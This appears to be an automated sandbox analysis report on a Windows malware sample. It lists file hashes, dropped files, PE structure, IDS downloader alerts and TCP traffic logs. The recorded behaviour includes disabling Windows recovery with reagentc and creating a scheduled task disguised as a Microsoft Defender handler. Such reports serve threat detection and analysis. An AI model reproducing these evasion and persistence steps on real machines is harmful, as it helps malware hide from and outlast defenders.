                                                                            SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                            MD5:04029E121A0CFA5991749937DD22A1D9
                                                                            SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                            SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                            SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                            • Filename: Social_Security_Statement_Review.vbs, Detection: malicious, Browse
                                                                            • Filename: Pollosappnuevo.bat, Detection: malicious, Browse
                                                                            • Filename: PollosAplicaccion.bat, Detection: malicious, Browse
                                                                            • Filename: gcapi64.cmd, Detection: malicious, Browse
                                                                            • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                                            • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: BrowserUpdater.lnk, Detection: malicious, Browse
                                                                            • Filename: Updater.lnk, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                            C:\Windows\Logs\ReAgent\ReAgent.log

                                                                            Download File
                                                                            Process:C:\Windows\System32\ReAgentc.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1815
                                                                            Entropy (8bit):4.309937617708667
                                                                            Encrypted:false
                                                                            SSDEEP:24:EQyQGIZQyQ9VRQcdnQ4jGQStQ2QH2EemWYUTQG0tQnQ/QHQp4X+jGQyQH/Q2:VLuLS9IS+2TE5WHkFB4wM+jnLI2
                                                                            MD5:8670BB37F60AAC8436C74BB2D8B679AE
                                                                            SHA1:8C67934FB3FF9C4D8F4E39D8690DF8AE9ABDB621
                                                                            SHA-256:165D886E9C172956CAA8401E22FBF0D832E3892848E4904BC22A2BD23FAE3760
                                                                            SHA-512:D611A25601F89BD8A8385CDCFB4DBF28E3EFAFC0D24164A20019BD348BAA5227B4A76A9B62C3BCC1630F9B93E7BAFBB570F2DD37ED01C23F7F3FE3E6F722026D
                                                                            Malicious:false
                                                                            Preview:.2024-12-03 09:27:17, Info [reagentc.exe] ------------------------------------------------------..2024-12-03 09:27:17, Info [reagentc.exe] -----Executing command line: reagentc.exe /disable-----..2024-12-03 09:27:17, Info [reagentc.exe] ------------------------------------------------------..2024-12-03 09:27:17, Info [reagentc.exe] Enter WinReUnInstall..2024-12-03 09:27:17, Info [reagentc.exe] Update enhanced config info is enabled...2024-12-03 09:27:17, Warning [reagentc.exe] Failed to get recovery entries: 0xc0000225..2024-12-03 09:27:17, Info [reagentc.exe] winreGetWinReGuid returning 0X490..2024-12-03 09:27:17, Info [reagentc.exe] ReAgentConfig::ReadBcdAndUpdateEnhancedConfigInfo WinRE disabled, WinRE Guid could not be determined (0x490) ..2024-12-03 09:27:17, Info [rea

                                                                            C:\Windows\Panther\UnattendGC\diagerr.xml

                                                                            Download File
                                                                            Process:C:\Windows\System32\ReAgentc.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (310)
                                                                            Category:dropped
                                                                            Size (bytes):50033
                                                                            Entropy (8bit):4.883239254194912
                                                                            Encrypted:false
                                                                            SSDEEP:384:53Iq3Ie3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3IM:5l7ljllllljjlllllllllljjllx
                                                                            MD5:2754EA3C489EE5AF280D95F8257E287B
                                                                            SHA1:1124520B543726CF18E704606742AEB8C3449F14
                                                                            SHA-256:E8CB47D213AEBEC6C211CEA0C4CCA50A1C79BCB76F8D46B9BFD3E113D08A7789
                                                                            SHA-512:7AEECE2CDE67E02D5E950404A33C1786DB506AABC05C96975937C8342FB9EACB67A48657B6D6CB0FD17787FDFB2577D4618ECD1F6DC14C4AD6B2B1F42026B1B5
                                                                            Malicious:false
                                                                            Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                            C:\Windows\Panther\UnattendGC\diagwrn.xml

                                                                            Download File
                                                                            Process:C:\Windows\System32\ReAgentc.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                                            Category:modified
                                                                            Size (bytes):51331
                                                                            Entropy (8bit):4.919477221392548
                                                                            Encrypted:false
                                                                            SSDEEP:384:53Iq3Ir3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Ik:5lQljllllljjlllllllllljjll3
                                                                            MD5:6275FF3EA96EC08FE007F12E5D9A161B
                                                                            SHA1:C34090D4F191AC30DEF7FACBA9D734303F309C81
                                                                            SHA-256:C1A2A3A02EDB6C727486EBFE68CC0F54C6A6CEB43979C58C91FF580FFF168055
                                                                            SHA-512:47AE2A537ED70F121F2FCCCAA0C821621CE043C4E6068E0B45F581E02253AD4DF827BA2B7B898EE056FD758E764A065B79D37A770A8BE3154205023671E955E0
                                                                            Malicious:false
                                                                            Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                            C:\Windows\Panther\UnattendGC\setuperr.log

                                                                            Download File
                                                                            Process:C:\Windows\System32\ReAgentc.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):224
                                                                            Entropy (8bit):4.636611165579195
                                                                            Encrypted:false
                                                                            SSDEEP:3:92UQsKO8/FFORYxZaMJAvK/kFpdEJwHVDMUQVY3d/BOxZ8SLS8/FFODLg2xBLELf:Yus/4YxzJ/MPxVZCYt/BOxRP/2wqBAAy
                                                                            MD5:55818DFECC174B55275FD0F36AB91473
                                                                            SHA1:F2861F20CE5C6A2411E3AC8BB02C039ADAC2A09F
                                                                            SHA-256:B3365771906BED81839987B87897FE34366B465F3AAC1B0FB84466081844E881
                                                                            SHA-512:E93D6482C54BC997E058782514C67D9136882EAC2A2BC20FF4612D49CEF1C544BCE5AE66A4AF08E4F2142C78F35735831381A262B7A44BF6796343473DE88984
                                                                            Malicious:false
                                                                            Preview:.2023-10-03 08:57:16, Error [msoobe.exe] COMMIT: failed for plugin LocalUser Plugin with hr=0x80070490..2024-12-03 09:27:17, Error [reagentc.exe] WinReUnInstall failed: : 0x2..

                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                            \Device\Null

                                                                            Download File
                                                                            Process:C:\Windows\System32\schtasks.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):109
                                                                            Entropy (8bit):4.492923321562382
                                                                            Encrypted:false
                                                                            SSDEEP:3:BgnKDOh5ejhADu2VxN3GDLVtEL/AXFN/FWKAK89AAAXb:BgnKqh5edmvVxJqOAVj2K89o
                                                                            MD5:3AC873CDEED7552F6006BC2B7E34D35A
                                                                            SHA1:BF735F150B6609867185CE52F551CC36434236E2
                                                                            SHA-256:401A1AB455981DF08FBE2C271808FAEEE0521B4B5E0F2D3F8F8C30537D8B34AF
                                                                            SHA-512:4F02EB22D158D1C8B0317BA7217604C430DCBE7978A23546DD2B8AE7D4013622F92952B01DC15249C57014C3551D8985CDDE14CC671E33E5C2AE886D6FCF49DA
                                                                            Malicious:false
                                                                            Preview:SUCCESS: The scheduled task "Microsoft Defender Threat Intelligence Handler" has successfully been created...

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):6.195629235058966
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:SplpM1fFkV.exe
                                                                            File size:5'043'200 bytes
                                                                            MD5:770bc9a9a9ff4284b8cb6e333478d25c
                                                                            SHA1:8f634709fea90f7b10a2612d250936f7459c7327
                                                                            SHA256:6a915f0e2eaa35eb47d70a933a4d8822d65e64ebea485d9dcb5657f1f4bd1cf8
                                                                            SHA512:30b7acd6de05973291d086b52d302f68031125c3164ca3cc102ae1d1d06ce9f798ceed6db693a73c1ba6ee721284b07ddc27e4c5cbf14e6f3933fdb18da397c3
                                                                            SSDEEP:49152:phizG03sNtvZdvbOjJPmpH5q9HOvLv5Fe1n5E4Gp9zSYpjvhZj:phiNya1+DfLvzQE3NSYRvhZ
                                                                            TLSH:21362953FD9244F4C0AE927489729257BA723C454B3423D73BA0F7683BB6BD06AB9740
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L......."......d$...................@..............................`R...........`... ............................

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x47b5c0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:1
                                                                            File Version Major:6
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:d42595b695fc008ef2c56aabd8efd68e

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp 00007F5C48C13830h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push ebp
                                                                            dec eax
                                                                            mov ebp, esp
                                                                            pushfd
                                                                            cld
                                                                            dec eax
                                                                            sub esp, 000000E0h
                                                                            dec eax
                                                                            mov dword ptr [esp], edi
                                                                            dec eax
                                                                            mov dword ptr [esp+08h], esi
                                                                            dec eax
                                                                            mov dword ptr [esp+10h], ebp
                                                                            dec eax
                                                                            mov dword ptr [esp+18h], ebx
                                                                            dec esp
                                                                            mov dword ptr [esp+20h], esp
                                                                            dec esp
                                                                            mov dword ptr [esp+28h], ebp
                                                                            dec esp
                                                                            mov dword ptr [esp+30h], esi
                                                                            dec esp
                                                                            mov dword ptr [esp+38h], edi
                                                                            movups dqword ptr [esp+40h], xmm6
                                                                            movups dqword ptr [esp+50h], xmm7
                                                                            inc esp
                                                                            movups dqword ptr [esp+60h], xmm0
                                                                            inc esp
                                                                            movups dqword ptr [esp+70h], xmm1
                                                                            inc esp
                                                                            movups dqword ptr [esp+00000080h], xmm2
                                                                            inc esp
                                                                            movups dqword ptr [esp+00000090h], xmm3
                                                                            inc esp
                                                                            movups dqword ptr [esp+000000A0h], xmm4
                                                                            inc esp
                                                                            movups dqword ptr [esp+000000B0h], xmm5
                                                                            inc esp
                                                                            movups dqword ptr [esp+000000C0h], xmm6
                                                                            inc esp
                                                                            movups dqword ptr [esp+000000D0h], xmm7
                                                                            inc ebp
                                                                            xorps xmm7, xmm7
                                                                            dec ebp
                                                                            xor esi, esi
                                                                            dec eax
                                                                            mov eax, dword ptr [0048166Ah]
                                                                            dec eax
                                                                            mov eax, dword ptr [eax]
                                                                            dec eax
                                                                            cmp eax, 00000000h
                                                                            je 00007F5C48C17115h
                                                                            dec esp
                                                                            mov esi, dword ptr [eax]
                                                                            dec eax
                                                                            sub esp, 10h
                                                                            dec eax
                                                                            mov eax, ecx
                                                                            dec eax
                                                                            mov ebx, edx
                                                                            call 00007F5C48C1E74Bh

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5180000x53e.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5040000x127e0.pdata
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5190000xb410.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x4821200x178.data
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x24623d0x2464006ac120aafb7ddb2bd110bd167ac421d5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x2480000x239e400x23a00035d7ebb8e46b9002610ba5f0f99e9337unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x4820000x810a00x302005d3d8e3500e5178bf1141db2bed74646False0.4452871347402597data5.48956922141304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .pdata0x5040000x127e00x12800adcb98c5935a1eea0adc5361397d5a6eFalse0.3940825591216216data5.377529615648138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .xdata0x5170000xb40x200b594718dba24a8c475ec09047e9aeec9False0.2265625data1.783206012798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .idata0x5180000x53e0x600c0624a6ccd958eb43c87e7676279bafeFalse0.3763020833333333OpenPGP Public Key4.003776101000281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .reloc0x5190000xb4100xb600311a4042f726c0a1e845d4eed33dac89False0.26113925137362637data5.423586682140615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .symtab0x5250000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Imports

                                                                            DLLImport
                                                                            kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-03T15:26:59.938026+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.54970620.233.83.145443TCP
                                                                            2024-12-03T15:27:01.675484+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707185.199.109.133443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 15:26:52.771112919 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:52.771158934 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:52.771229982 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:52.783318996 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:52.783338070 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:54.417042971 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:54.417117119 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:54.420634985 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:54.420655966 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:54.421017885 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:54.440443039 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:54.483334064 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:55.354795933 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:55.355901003 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:55.355976105 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:55.355979919 CET4434970420.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:55.356039047 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:55.359018087 CET49704443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:55.509776115 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:55.509830952 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:55.509910107 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:55.510232925 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:55.510248899 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:56.736008883 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:56.736116886 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:56.739433050 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:56.739447117 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:56.739737034 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:56.740608931 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:56.783337116 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.215421915 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.215826035 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.215852022 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.215905905 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:57.215924978 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.215962887 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:57.220904112 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.220962048 CET44349705185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:57.221028090 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:57.340675116 CET49705443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:57.386964083 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:57.387017012 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:57.387100935 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:57.387404919 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:57.387414932 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.008157969 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.009679079 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:59.009691000 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.938033104 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.938436031 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.938487053 CET4434970620.233.83.145192.168.2.5
                                                                            Dec 3, 2024 15:26:59.938505888 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:59.938535929 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:59.938927889 CET49706443192.168.2.520.233.83.145
                                                                            Dec 3, 2024 15:26:59.939356089 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:59.939399958 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:26:59.939477921 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:59.939649105 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:26:59.939661026 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.195787907 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.196861982 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.196882963 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.675509930 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.676331043 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.676386118 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.676398039 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.678400040 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.678455114 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.678461075 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.686928034 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.686976910 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.686989069 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.695373058 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.695425034 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.695434093 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.703902960 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.703950882 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.703957081 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.754015923 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.796170950 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.847783089 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.847796917 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.879582882 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.879671097 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.879681110 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.887041092 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.887094021 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.887101889 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.894505978 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.894561052 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.894567966 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.902004957 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.902070999 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.902081013 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.916632891 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.916688919 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.916697979 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.924249887 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:01.924302101 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:01.924309969 CET44349707185.199.109.133192.168.2.5
